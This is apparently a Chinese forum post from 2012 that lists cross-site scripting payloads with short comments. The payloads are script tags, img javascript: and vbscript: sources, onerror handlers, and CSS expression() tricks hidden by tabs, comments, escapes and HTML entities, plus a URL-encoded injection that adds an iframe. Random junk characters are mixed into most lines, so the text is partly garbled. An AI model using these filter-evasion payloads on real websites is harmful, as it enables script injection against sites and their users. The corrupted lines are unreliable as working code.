<script>alert("跨站")</script> (最常用)' o( ~. |1 i& K; q7 c$ f
<img scr=javascript:alert("跨站")></img>" X" N# f" Y, [' N# l0 U0 y0 [
<img scr="javascript: alert(/跨站/)></img>
( W0 P0 U& `! L+ ^8 X+ @<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)5 ]; K8 T+ e5 L5 n5 f) S
<img scr="#" onerror=alert(/跨站/)></img>5 Y4 f5 D" `5 n7 s, r7 R
<img scr="#" style="xss:expression(alert(/xss/));"></img>
# A: x3 K& i. ]2 O, ?' [<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)0 T* I0 B- x% @% d
<img src=vbscript:msgbox ("xss")></img>5 m/ x% ]9 Z1 T7 S9 M$ W) V, ^
<style> input {left:expression (alert('xss'))}</style>9 W( U* @9 M7 J& P: [8 l
<div style={left:expression (alert('xss'))}></div>" E' z0 k) l( y: r
<div style={left:exp/* */ression (alert('xss'))}></div>5 q. w1 @+ @8 N) @. m# _& |7 e2 ^2 h
<div style={left:\0065\0078ression (alert('xss'))}></div>
6 P2 I4 v6 r: b# v1 Z7 f' a" Ohtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>- H+ W' k: A( o5 j( x
unicode <div style="{left:expRessioN (alert('xss'))}">
" f* H: X; J* Q# O3 B: d, [4 t1 h; M1 `9 U6 ~% N4 J$ n- r: p5 H2 s
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["# M+ W7 k# f2 n9 n9 y
|
发表于 2012-9-13 17:15:04
收藏
支持
反对